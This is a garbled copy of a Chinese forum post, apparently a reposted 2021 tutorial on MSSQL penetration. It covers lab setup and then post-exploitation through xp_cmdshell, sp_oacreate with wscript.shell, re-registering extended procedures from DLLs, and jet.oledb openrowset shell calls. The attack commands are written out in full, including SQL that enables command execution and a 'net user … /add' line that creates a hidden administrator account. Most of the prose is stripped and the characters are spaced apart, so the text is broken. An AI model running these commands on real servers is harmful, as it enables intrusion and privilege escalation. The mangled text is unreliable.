[16997] 2021-07-07_数据库安全之MSSQL渗透

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2021-07-07_数据库安全之MSSQL渗透 M S S Q L K r 1 p t 0   F r e e B u f   2 0 2 1 - 0 7 - 0 7 M S S Q L M S S Q L M S S Q L M S S Q L M S S Q L M S S Q L s p _ o a c r e a t e s p _ o a m e t h o d 使 x p _ c m d s h e l l x p _ r e g w r i t e M S S Q L M S S Q L M S S Q L M S S Q L 使   1 4 3 3 S A 使 S A S A 2 0 1 9 M S S Q L s a s y s t e m S Q L S e r v e r d b   u s e r s - a d m i n i s t r a t o r s p u b l i c   g u e s t - u s e r s M S S Q L 使 T _ S Q L 便 访 使 s q l   m a s t e r s p _   ( D L L ) x p * * _ 使 使   * * S Q L S e r v e r 使 4 m a s t e r m a s t e r S Q L s e r v e r m o d e l m o d e l S Q L s e r v e r m o d e l m s d b m s d b S Q L s e r v e r m s d b S Q L s e r v e r   a g e n t 使 t e m p d b 访 S Q L   S e r v e r 使 S Q L   S e r v e r 西 t e m p d b t e m p d b S Q L   S e r v e r t e m p d b t e m p d b M S S Q L M S S Q L M Y S Q L 使 T - S Q L M S S Q L M Y S Q L W i n d o w s 使 使 W i n d o w s S A W E B S Q L M y s q l 1 M S S Q L   2 0 1 9 W i n 2 0 1 6   +   M S S Q L 2 0 1 9 h t t p s : / / w w w . m i c r o s o f t . c o m / z h - c n / s q l - s e r v e r / s q l - s e r v e r - d o w n l o a d s S Q L   S e r v e r   2 0 1 9   E x p r e s s   E d i t i o n M S S Q L ( M i c r o S o f t   S Q L   S e r v e r ) D B M S S S M S ( S Q L   S e r v e r   M a n a g e r m e n t   S t u d i o ) S Q L   S e r v e r S A ( S y s t e m   A d m i n i s t r a t o r ) S Q L S e r v e r 2 0 1 9 S Y S T E M m s s q l s e r v e r e x e c u t e - ( B )
S Q L   S e r v e r   M a n a g e r m e n t   S t u d i o | S S M S S Q L   S e r v e r   E x p r e s s 2 M S S Q L   2 0 0 8   x 6 4   W i n 2 0 1 6   +   M S S Q L 2 0 0 8 h t t p s : / / w w w . m i c r o s o f t . c o m / z h - C N / d o w n l o a d / d e t a i l s . a s p x ? i d = 3 0 4 3 8 S Q L E X P R _ x 6 4 _ C H S . e x e 2 0 1 9 S Q L M a n a g e m e n t S t u d i o _ x 6 4 _ C H S . e x e   h t t p s : / / w w w . c n b l o g s . c o m / l a b s t e r / p / 1 4 8 6 3 5 1 6 . h t m l 3 M S S Q L   2 0 0 8   x 3 2   W i n 2 0 0 3   +   M S S Q L 2 0 0 8 h t t p s : / / w w w . m i c r o s o f t . c o m / z h - C N / d o w n l o a d / d e t a i l s . a s p x ? i d = 3 0 4 3 8 3 2 使 0 3 0 8 - ( B ) - - ( S Q L   S e r v e r W i n d o w s   ) ( M ) S Q L   S e r v e r S A 1 2 3 . c o m S S M S " S S M S " S S M S - - - ( S Q L   S e r v e r W i n d o w s   ) ( M ) S Q L   S e r v e r S A 1 2 3 . c o m . N E T 3 . 5 W i n 2 0 0 3   x 3 2
1 2 5 3 4 M S S Q L 1 S S M S S Q L E X P R _ x 8 6 _ C H S . e x e . N E T   3 . 5 W i n d o w s _ I n s t a l l e r 4 . 5 x 8 6 . e x e p o w e r s h e l l 2 0 0 3 x 8 6 - C H S . e x e h t t p s : / / p a n . b a i d u . c o m / s / 1 5 C n g C B W i g n 9 f Y 1 I r S t 4 _ j g f m 4 v
使 S Q L   S e r v e r     W i n d o w s   i p   使 使 i p   h t t p s : / / b l o g . c s d n . n e t / w e i x i n _ 3 0 7 4 0 2 9 5 / a r t i c l e / d e t a i l s / 9 5 5 3 5 9 2 7 M S S Q L i p 2 0 1 9 1 2 T C P / I P 3 S S M S s a : 1 2 3 . c o m S Q L   S e r v e r   M S S Q L S E R V E R T C P / I P
4 5 S S M S C M D 使 I P n e t   s t o p   m s s q l s e r v e r n e t   s t a r t   m s s q l s e r v e r
2 M S S Q L M S S Q L M S S Q L 1 使 使 x p _ c m d s h e l l x p _ c m d s h e l l m s s q l 2 0 0 0 m s s q l 2 0 0 5 0 x 0 1   x p _ c m d s h e l l   s h e l l   s a 0 x 0 2   x p _ c m d s h e l l 使 1 x p _ c m d s h e l l 1 s e l e c t   @ @ V E R S I O N S E L E C T   n a m e   F R O M   M A S t e r . . S y s D a t a b A S e s   O R D E R   B Y   n a m e S E L E C T   S y s O b j e c t s . n a m e   A S   T a b l e n a m e   F R O M   s y s o b j e c t s   W H E R E   x t y p e   =   ' U '   a n d   s y s s t a t < 2 0 0 e x e c   x p _ d i r t r e e   ' c : '                 #   c : e x e c   x p _ d i r t r e e   ' c : ' , 1             #   c : e x e c   x p _ d i r t r e e   ' c : ' , 1 , 1         #   c : e x e c   x p _ s u b d i r s   ' C : ' ;               #   c : s e l e c t   i s _ s r v r o l e m e m b e r ( ' s y s a d m i n ' )   #   S A s e l e c t   i s _ m e m b e r ( ' d b _ o w n e r ' )                 #   d b _ o w n e r s e l e c t   i s _ s r v r o l e m e m b e r ( ' p u b l i c ' )       #   p u b l i c E X E C   s p _ c o n f i g u r e   ' O l e   A u t o m a t i o n   P r o c e d u r e s '       # O L E   A u t o m a t i o n   P r o c e d u r e s x p ` ` _ c m d s h e l l S q l   S e r v e r x p ` ` _ c m d s h e l l s e l e c t   c o u n t ( * )   f r o m   m a s t e r . d b o . s y s o b j e c t s   w h e r e   x t y p e = ' x '   a n d   n a m e = ' x p _ c m d s h e l l ' x p ` ` _ c m d s h e l l F a c e t s
2 x p _ c m d s h e l l 3 x p _ c m d s h e l l X P ` ` C m d S h e l l E n a b l e d T r u e E X E C   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' ,   1 R E C O N F I G U R E E X E C   s p _ c o n f i g u r e   ' x p _ c m d s h e l l ' , 1 R E C O N F I G U R E E X E C   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' ,   1 R E C O N F I G U R E E X E C   s p _ c o n f i g u r e   ' x p _ c m d s h e l l ' , 0 R E C O N F I G U R E e x e c   x p _ c m d s h e l l   " w h o a m i " m a s t e r . . x p _ c m d s h e l l   ' w h o a m i '         ( 2 0 0 8 ) E X E C   m a s t e r . . x p _ c m d s h e l l   " w h o a m i " E X E C   m a s t e r . d b o . x p _ c m d s h e l l   " i p c o n f i g "
M S S Q L 2 0 1 9 使 m s s q l s e r v e r s y s t e m 0 x 0 3   M S S Q L 2 0 0 8   s a w m i e x e c s h e l l 线 C S M S S Q L | 线 线 C S 0 x 0 4   C 2 使 使 s p _ o a c r e a t e | M S S Q L I P 1 9 2 . 1 6 8 . 1 1 2 . 1 6 6 e x e c   m a s t e r . . x p _ c m d s h e l l   " n e t   u s e r   t e s t 1 2   1 2 3 . c o m   / a d d " e x e c   m a s t e r . . x p _ c m d s h e l l   " n e t   l o c a l g r o u p   a d m i n i s t r a t o r s   t e s t 1 2   / a d d " e x e c   m a s t e r . . x p _ c m d s h e l l   " n e t   u s e r   t e s t 1 2 " x p _ c m d s h e l l e x e c   s p _ d r o p e x t e n d e d p r o c   ' x p _ c m d s h e l l ' x p ` ` _ c m d s h e l l E X E C   s p _ a d d e x t e n d e d p r o c   x p _ c m d s h e l l , @ d l l n a m e   = ' x p l o g 7 0 . d l l ' d e c l a r e   @ o   i n t ; s p _ a d d e x t e n d e d p r o c   ' x p _ c m d s h e l l ' ,   ' x p s q l 7 0 . d l l ' ; x p _ c m d s h e l l x p l o g 7 0 . d l l x p _ c m d s h e l l
0 x 0 1   s p _ o a c r e a t e w s c r i p t . s h e l 使 O L E 访 O L E   A u t o m a t i o n   P r o c e d u r e s 使 1 . s q l s e r v e r   s y s a d m i n 2 0 1 9 s a m s s q l s e r v e r 2 . s q l s e r v e r 3 . O L E   A u t o m a t i o n   P r o c e d u r e s 0 x 0 2   s p _ o a c r e a t e 使 使 1 s p _ o a c r e a t e 1 2 O L E   A u t o m a t i o n   P r o c e d u r e s   O L E   A u t o m a t i o n   P r o c e d u r e s     s p _ O A C r e a t e     O L E   3 s p _ o a c r e a t e s p _ o a m e t h o d s p _ o a c r e a t e s p _ o a m e t h o d w s c r i p t . s h e l l s p _ o a c r e a t e s p _ o a m e t h o d s p _ c o n f i g u r e s p _ o a c r e a t e s p _ o a m e t h o d s p _ o a c r e a t e s p _ o a m e t h o d x p _ c m d s h e l l s e l e c t   c o u n t ( * )   f r o m   m a s t e r . d b o . s y s o b j e c t s   w h e r e   x t y p e = ' x '   a n d   n a m e = ' S P _ O A C R E A T E ' ; s p _ o a c r e a t e e x e c   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' , 1 ; r e c o n f i g u r e ; e x e c   s p _ c o n f i g u r e   ' O l e   A u t o m a t i o n   P r o c e d u r e s ' , 1 ; r e c o n f i g u r e ; e x e c   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' , 1 ; r e c o n f i g u r e ; e x e c   s p _ c o n f i g u r e   ' O l e   A u t o m a t i o n   P r o c e d u r e s ' , 0 ; r e c o n f i g u r e ; d e c l a r e   @ s h e l l   i n t   e x e c   s p _ o a c r e a t e   ' w s c r i p t . s h e l l ' , @ s h e l l   o u t p u t   e x e c   s p _ o a m e t h o d   @ s h e l l , ' r u n ' , n u l l , ' c : w i n d o w s s y s t e m 3 2 c m d . e x e   / c   w h o a m i   > c : s q l t e s t . t x t ' ; 0
使 4 . 1 s h e l l 3 S Q L   S e r v e r   0 x 0 1   S Q L   S e r v e r   使 K i l l     S h e l l   1 . 3 2 6 4 1 2 . 0   0 x 0 2   1   j e t . o l e d b   使 使 d e c l a r e   @ r e s u l t   i n t d e c l a r e   @ f s o _ t o k e n   i n t e x e c   s p _ o a c r e a t e   ' s c r i p t i n g . f i l e s y s t e m o b j e c t ' ,   @ f s o _ t o k e n   o u t e x e c   s p _ o a m e t h o d   @ f s o _ t o k e n , ' d e l e t e f i l e ' , n u l l , ' c : s q l t e s t . t x t ' e x e c   s p _ o a d e s t r o y   @ f s o _ t o k e n j e t . o l e d b m d b m d b M i c r o s o f t . J e t . O L E D B . 4 . 0 2 . d n a r y . m d b i a s . m d b w i n 2 0 0 3 S Q L   S e r v e r 2 0 0 8   ( W i n 2 0 0 3 - x 3 2 ) I P :   1 9 2 . 1 6 8 . 1 1 2 . 1 7 3 s e l e c t   *   f r o m   o p e n r o w s e t ( ' m i c r o s o f t . j e t . o l e d b . 4 . 0 ' , ' ; d a t a b a s e = c : w i n d o w s s y s t e m 3 2 i a s i a s . m d b ' , ' s e l e c t   s h e l l ( " c m d . e x e   / c   w h o a m i " ) ' )
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则